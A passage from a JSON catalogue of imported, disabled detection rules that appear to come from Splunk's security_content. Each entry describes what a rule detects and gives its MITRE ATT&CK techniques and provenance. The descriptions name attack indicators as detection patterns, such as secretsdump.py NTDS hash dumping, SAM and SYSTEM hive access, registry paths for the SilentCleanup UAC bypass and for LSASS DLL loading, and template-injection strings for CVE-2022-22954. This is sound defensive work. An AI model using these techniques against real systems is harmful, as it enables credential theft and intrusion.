If confirmed malicious, this behavior could allow an attacker to execute arbitrary code, potentially leading to system compromise, data exfiltration, or further lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-office-product-spawned-uncommon-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "55d8741c-fa32-4692-8109-410304961eb8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_office_product_spawned_uncommon_process.yml" } }, { "id": "splunk-security-content-55f22929-cfd3-4388-ba5c-4d01fac7ee7e", "type": "detection", "name": "Windows IIS Components New Module Added", "description": "The following analytic detects the addition of new IIS modules on a Windows IIS server. It leverages the Windows Event log - Microsoft-IIS-Configuration/Operational, specifically EventCode 29, to identify this activity. This behavior is significant because IIS modules are rarely added to production servers, and unauthorized modules could indicate malicious activity. 
If confirmed malicious, an attacker could use these modules to execute arbitrary code, escalate privileges, or maintain persistence within the environment, potentially compromising the server and sensitive data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1505.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-iis-components-new-module-added.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "55f22929-cfd3-4388-ba5c-4d01fac7ee7e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_iis_components_new_module_added.yml" } }, { "id": "splunk-security-content-55fb2958-9ecd-11ec-a06a-acde48001122", "type": "detection", "name": "Windows Disable Shutdown Button Through Registry", "description": "The following analytic detects suspicious registry modifications that disable the shutdown button on a user's logon screen. It leverages data from the Endpoint.Registry data model, specifically monitoring changes to registry paths associated with shutdown policies. This activity is significant because it is a tactic used by malware, particularly ransomware like KillDisk, to hinder system usability and prevent the removal of malicious changes. 
If confirmed malicious, this could impede system recovery efforts, making it difficult to restart the machine and remove other harmful modifications.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-disable-shutdown-button-through-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "55fb2958-9ecd-11ec-a06a-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_disable_shutdown_button_through_registry.yml" } }, { "id": "splunk-security-content-5628e0b7-73dc-4f1b-b37a-6e68efc2225f", "type": "detection", "name": "Windows Audit Policy Security Descriptor Tampering via Auditpol", "description": "The following analytic identifies the execution of `auditpol.exe` with the \"/set\" flag, and \"/sd\" command-line arguments used to modify the security descriptor of the audit policy. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity can be significant as it indicates potential defense evasion by adversaries or Red Teams, aiming to limit data that can be leveraged for detections and audits. An attacker can disable certain policy categories from logging and then change the security descriptor in order to prevent certain users or applications from reverting their changes. 
If confirmed malicious, this behavior could allow attackers to bypass defenses, and plan further attacks, potentially leading to full machine compromise or lateral movement.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-audit-policy-security-descriptor-tampering-via-auditpol.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5628e0b7-73dc-4f1b-b37a-6e68efc2225f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_audit_policy_security_descriptor_tampering_via_auditpol.yml" } }, { "id": "splunk-security-content-5643cdc9-a0be-4123-860b-f13da0bf4fcb", "type": "detection", "name": "ESXi VM Discovery", "description": "This detection identifies the use of ESXCLI commands to discover virtual machines on an ESXi host. While used by administrators, this activity may also indicate adversary reconnaissance aimed at identifying high-value targets, mapping the virtual environment, or preparing for data theft or destructive operations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1673" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/esxi-vm-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC 
engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5643cdc9-a0be-4123-860b-f13da0bf4fcb", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/esxi_vm_discovery.yml" } }, { "id": "splunk-security-content-5672819c-be09-11eb-bbfb-acde48001122", "type": "detection", "name": "SecretDumps Offline NTDS Dumping Tool", "description": "The following analytic detects the potential use of the secretsdump.py tool to dump NTLM hashes from a copy of ntds.dit and the SAM, SYSTEM, and SECURITY registry hives. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on specific command-line patterns and process names associated with secretsdump.py. This activity is significant because it indicates an attempt to extract sensitive credential information offline, which is a common post-exploitation technique. 
If confirmed malicious, this could allow an attacker to obtain NTLM hashes, facilitating further lateral movement and potential privilege escalation within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/secretdumps-offline-ntds-dumping-tool.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5672819c-be09-11eb-bbfb-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/secretdumps_offline_ntds_dumping_tool.yml" } }, { "id": "splunk-security-content-5682052e-ce55-4f9f-8d28-59191420b7e0", "type": "detection", "name": "Windows AD Suspicious Attribute Modification", "description": "This detection monitors changes to the following Active Directory attributes: \"msDS-AllowedToDelegateTo\", \"msDS-AllowedToActOnBehalfOfOtherIdentity\", \"msDS-KeyCredentialLink\", \"scriptPath\", and \"msTSInitialProgram\". Modifications to these attributes can indicate potential malicious activity or privilege escalation attempts. 
Immediate investigation is recommended upon alert.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1222.001", "T1550" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-suspicious-attribute-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5682052e-ce55-4f9f-8d28-59191420b7e0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ad_suspicious_attribute_modification.yml" } }, { "id": "splunk-security-content-568cb83e-d79e-4a23-85ec-6e1f6c30cb2f", "type": "detection", "name": "Cisco NVM - Suspicious Network Connection to IP Lookup Service API", "description": "This analytic identifies non-browser processes reaching out to public IP lookup or geolocation services,\nsuch as `ipinfo.io`, `icanhazip.com`, `ip-api.com`, and others.\nThese domains are commonly used by legitimate tools, but their usage outside of browsers may indicate\nnetwork reconnaissance, virtual machine detection, or staging by malware.\nThis activity is observed in post-exploitation frameworks, stealer malware, and advanced threat actor campaigns.\nThe detection relies on Cisco Network Visibility Module (NVM) telemetry and excludes known browser\nprocesses to reduce noise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1590.005", "T1016" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": 
false, "path": "detections/splunk-imports/_quarantine/cisco-nvm-suspicious-network-connection-to-ip-lookup-service-api.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "568cb83e-d79e-4a23-85ec-6e1f6c30cb2f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/cisco_nvm___suspicious_network_connection_to_ip_lookup_service_api.yml" } }, { "id": "splunk-security-content-56a3ac65-e747-41f7-b014-dff7423c1dda", "type": "detection", "name": "ConnectWise ScreenConnect Path Traversal", "description": "The following analytic detects attempts to exploit the ConnectWise ScreenConnect CVE-2024-1708 vulnerability, which allows path traversal attacks by manipulating file_path and file_name parameters in the URL. It leverages the Endpoint datamodel Filesystem node to identify suspicious file system events, specifically targeting paths and filenames associated with ScreenConnect. This activity is significant as it can lead to unauthorized access to sensitive files and directories, potentially resulting in data exfiltration or arbitrary code execution. 
If confirmed malicious, attackers could gain unauthorized access and control over the host system, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/connectwise-screenconnect-path-traversal.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "56a3ac65-e747-41f7-b014-dff7423c1dda", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/connectwise_screenconnect_path_traversal.yml" } }, { "id": "splunk-security-content-56a8771a-3fda-4959-b81d-2f266e2f679f", "type": "detection", "name": "WordPress Bricks Builder plugin RCE", "description": "The following analytic identifies potential exploitation of the WordPress Bricks Builder plugin RCE vulnerability. It detects HTTP POST requests to the URL path \"/wp-json/bricks/v1/render_element\" with a status code of 200, leveraging the Web datamodel. This activity is significant as it indicates an attempt to exploit CVE-2024-25600, a known vulnerability that allows remote code execution. 
If confirmed malicious, an attacker could execute arbitrary commands on the target server, leading to potential full system compromise and unauthorized access to sensitive data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/wordpress-bricks-builder-plugin-rce.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "56a8771a-3fda-4959-b81d-2f266e2f679f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/wordpress_bricks_builder_plugin_rce.yml" } }, { "id": "splunk-security-content-56b2e58c-5909-49a3-998e-1f4815186ec2", "type": "detection", "name": "Windows Advanced Installer MSIX with AI_STUBS Execution", "description": "The following analytic identifies the execution of Advanced Installer MSIX Package Support Framework (PSF) components, specifically the AI_STUBS executables with the original filename 'popupwrapper.exe'. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process paths and original filenames. This activity is significant as adversaries have been observed packaging malicious content within MSIX files built with Advanced Installer to bypass security controls. These AI_STUBS executables (with original filename 'popupwrapper.exe') are hallmark artifacts of potentially malicious MSIX packages. 
If confirmed malicious, this could allow attackers to execute arbitrary code, establish persistence, or deliver malware while evading traditional detection mechanisms.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218", "T1553.005", "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-advanced-installer-msix-with-ai-stubs-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "56b2e58c-5909-49a3-998e-1f4815186ec2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_advanced_installer_msix_with_ai_stubs_execution.yml" } }, { "id": "splunk-security-content-56d7cfcc-da63-11eb-92d4-acde48001122", "type": "detection", "name": "SilentCleanup UAC Bypass", "description": "The following analytic detects suspicious modifications to the registry that may indicate a UAC (User Account Control) bypass attempt via the SilentCleanup task. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on registry changes in the path \"*\\\\Environment\\\\windir\" with executable values. This activity is significant as it can allow an attacker to gain high-privilege execution without user consent, bypassing UAC protections. 
If confirmed malicious, this could lead to unauthorized administrative access, enabling further system compromise and persistence.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/silentcleanup-uac-bypass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "56d7cfcc-da63-11eb-92d4-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/silentcleanup_uac_bypass.yml" } }, { "id": "splunk-security-content-56e877a6-1455-4479-ada6-0550dc1e22f8", "type": "detection", "name": "Email Attachments With Lots Of Spaces", "description": "The following analytic detects email attachments with an unusually high number of spaces in their file names, which is a common tactic used by attackers to obfuscate file extensions. It leverages the Email data model to identify attachments where the ratio of spaces to the total file name length exceeds 10%. This behavior is significant as it may indicate an attempt to bypass security filters and deliver malicious payloads. 
If confirmed malicious, this activity could lead to the execution of harmful code or unauthorized access to sensitive information within the recipient's environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001", "T1036.008" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/email-attachments-with-lots-of-spaces.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "56e877a6-1455-4479-ada6-0550dc1e22f8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/email_attachments_with_lots_of_spaces.yml" } }, { "id": "splunk-security-content-56fe46ca-ffef-46fe-8f0e-5cd4b7b4cc0c", "type": "detection", "name": "Windows Compatibility Telemetry Suspicious Child Process", "description": "The following analytic detects the execution of CompatTelRunner.exe with parameters indicative of a process not part of the normal \"Microsoft Compatibility Appraiser\" telemetry collection. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names, parent processes, and command-line arguments. This activity is significant because CompatTelRunner.exe and the \"Microsoft Compatibility Appraiser\" task always run as System and can be used to elevate privileges or establish a highly privileged persistence mechanism. 
If confirmed malicious, this could enable unauthorized code execution, privilege escalation, or persistent access to the compromised system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546", "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-compatibility-telemetry-suspicious-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "56fe46ca-ffef-46fe-8f0e-5cd4b7b4cc0c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_compatibility_telemetry_suspicious_child_process.yml" } }, { "id": "splunk-security-content-5728bb16-1a0b-4b66-bce2-0074ac839770", "type": "detection", "name": "Linux Auditd Hardware Addition Swapoff", "description": "The following analytic detects the execution of the \"swapoff\" command, which disables the swapping of paging devices on a Linux system. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs. This activity is significant because disabling swap can be a tactic used by malware, such as Awfulshred, to evade detection and hinder forensic analysis. 
If confirmed malicious, this action could allow an attacker to manipulate system memory management, potentially leading to data corruption, system instability, or evasion of memory-based detection mechanisms.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1200" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-hardware-addition-swapoff.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5728bb16-1a0b-4b66-bce2-0074ac839770", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_hardware_addition_swapoff.yml" } }, { "id": "splunk-security-content-57551656-ebdb-11eb-afdf-acde48001122", "type": "detection", "name": "SAM Database File Access Attempt", "description": "The following analytic detects attempts to access the SAM, SYSTEM, or SECURITY database files within the `windows\\system32\\config` directory using Windows Security EventCode 4663. This detection leverages Windows Security Event logs to identify unauthorized access attempts. Monitoring this activity is crucial as it indicates potential credential access attempts, possibly exploiting vulnerabilities like CVE-2021-36934. 
If confirmed malicious, an attacker could extract user passwords, leading to unauthorized access, privilege escalation, and further compromise of the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/sam-database-file-access-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "57551656-ebdb-11eb-afdf-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/sam_database_file_access_attempt.yml" } }, { "id": "splunk-security-content-5790a766-53b8-40d3-a696-3547b978fcf0", "type": "detection", "name": "Ngrok Reverse Proxy on Network", "description": "The following analytic detects DNS queries to common Ngrok domains, indicating potential use of the Ngrok reverse proxy tool. It leverages the Network Resolution datamodel to identify queries to domains such as \"*.ngrok.com\" and \"*.ngrok.io\". While Ngrok usage is not inherently malicious, it has been increasingly adopted by adversaries for covert communication and data exfiltration. 
If confirmed malicious, this activity could allow attackers to bypass network defenses, establish persistent connections, and exfiltrate sensitive data, posing a significant threat to the network's security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1572", "T1090", "T1102" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/ngrok-reverse-proxy-on-network.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5790a766-53b8-40d3-a696-3547b978fcf0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/ngrok_reverse_proxy_on_network.yml" } }, { "id": "splunk-security-content-5796b570-ad12-44df-b1b5-b7e6ae3aabb0", "type": "detection", "name": "VMware Server Side Template Injection Hunt", "description": "The following analytic identifies potential server-side template injection attempts related to CVE-2022-22954.\nIt detects suspicious URL patterns containing \"deviceudid\" and keywords like \"java.lang.ProcessBuilder\" or \"freemarker.template.utility.ObjectConstructor\" using web or proxy logs within the Web Datamodel.\nThis activity is significant as it may indicate an attempt to exploit a known vulnerability in VMware, potentially leading to remote code execution.\nIf confirmed malicious, attackers could gain unauthorized access, execute arbitrary code, and compromise the affected system, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", 
"mitre_techniques": [ "T1190", "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/vmware-server-side-template-injection-hunt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5796b570-ad12-44df-b1b5-b7e6ae3aabb0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/vmware_server_side_template_injection_hunt.yml" } }, { "id": "splunk-security-content-57a0a2bf-353f-40c1-84dc-29293f3c35b7", "type": "detection", "name": "Unusually Long Content-Type Length", "description": "The following analytic identifies unusually long strings in the Content-Type HTTP header sent by the client to the server. It uses data from the Stream:HTTP source, specifically evaluating the length of the `cs_content_type` field. This activity is significant because excessively long Content-Type headers can indicate attempts to exploit vulnerabilities or evade detection mechanisms. 
If confirmed malicious, this behavior could allow attackers to execute code, manipulate data, or bypass security controls, potentially leading to unauthorized access or data breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/unusually-long-content-type-length.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "57a0a2bf-353f-40c1-84dc-29293f3c35b7", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/unusually_long_content_type_length.yml" } }, { "id": "splunk-security-content-57ad5a64-9df7-11eb-a290-acde48001122", "type": "detection", "name": "Windows Multiple Invalid Users Failed To Authenticate Using NTLM", "description": "The following analytic detects a single source endpoint failing to authenticate with 30 unique invalid users using the NTLM protocol. It leverages EventCode 4776 from Domain Controller logs, focusing on error code 0xC0000064, which indicates non-existent usernames. This behavior is significant as it may indicate a Password Spraying attack, where an adversary attempts to gain initial access or elevate privileges. 
If confirmed malicious, this activity could lead to unauthorized access, privilege escalation, and potential compromise of sensitive information within the Active Directory environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-multiple-invalid-users-failed-to-authenticate-using-ntlm.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "57ad5a64-9df7-11eb-a290-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_multiple_invalid_users_failed_to_authenticate_using_ntlm.yml" } }, { "id": "splunk-security-content-57d44d70-28d9-4ed1-acf5-1c80ae2bbce3", "type": "detection", "name": "Ryuk Test Files Detected", "description": "The following analytic identifies the presence of files containing the keyword \"Ryuk\" in any folder on the C drive, indicative of Ryuk ransomware activity. It leverages the Endpoint Filesystem data model to detect file paths matching this pattern. This activity is significant as Ryuk ransomware is known for its destructive impact, encrypting critical files and demanding ransom. If confirmed malicious, this could lead to significant data loss, operational disruption, and financial damage due to ransom payments and recovery efforts. 
Immediate investigation and response are crucial to mitigate potential damage.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1486" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/ryuk-test-files-detected.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "57d44d70-28d9-4ed1-acf5-1c80ae2bbce3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/ryuk_test_files_detected.yml" } }, { "id": "splunk-security-content-57e27f27-369c-4df8-af08-e8c7ee8373d4", "type": "detection", "name": "Windows AD Short Lived Domain Controller SPN Attribute", "description": "The following analytic detects the temporary addition of a global catalog SPN or a DRS RPC SPN to an Active Directory computer object, indicative of a potential DCShadow attack. This detection leverages EventCode 5136 from the `wineventlog_security` data source, focusing on specific SPN attribute changes. This activity is significant as DCShadow attacks allow attackers with privileged access to register rogue Domain Controllers, enabling unauthorized changes to the AD infrastructure. 
If confirmed malicious, this could lead to unauthorized replication of changes, including credentials and keys, compromising the entire domain's security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1207" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-short-lived-domain-controller-spn-attribute.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "57e27f27-369c-4df8-af08-e8c7ee8373d4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ad_short_lived_domain_controller_spn_attribute.yml" } }, { "id": "splunk-security-content-57fb8656-141e-4d8a-9f51-62cff4ecb82a", "type": "detection", "name": "Windows Autostart Execution LSASS Driver Registry Modification", "description": "The following analytic detects modifications to undocumented registry keys that allow a DLL to load into lsass.exe, potentially capturing credentials. It leverages the Endpoint.Registry data model to identify changes to \\CurrentControlSet\\Services\\NTDS\\DirectoryServiceExtPt or \\CurrentControlSet\\Services\\NTDS\\LsaDbExtPt. This activity is significant as it indicates a possible attempt to inject malicious code into the Local Security Authority Subsystem Service (LSASS), which can lead to credential theft. 
If confirmed malicious, this could allow attackers to gain unauthorized access to sensitive information and escalate privileges within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.008" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-autostart-execution-lsass-driver-registry-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "57fb8656-141e-4d8a-9f51-62cff4ecb82a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_autostart_execution_lsass_driver_registry_modification.yml" } }, { "id": "splunk-security-content-58194e28-ae5e-11eb-8912-acde48001122", "type": "detection", "name": "Download Files Using Telegram", "description": "The following analytic detects suspicious file downloads by the Telegram application on a Windows system. It leverages Sysmon EventCode 15 to identify instances where Telegram.exe creates files with a Zone.Identifier, indicating a download. This activity is significant as it may indicate an adversary using Telegram to download malicious tools, such as network scanners, for further exploitation. 
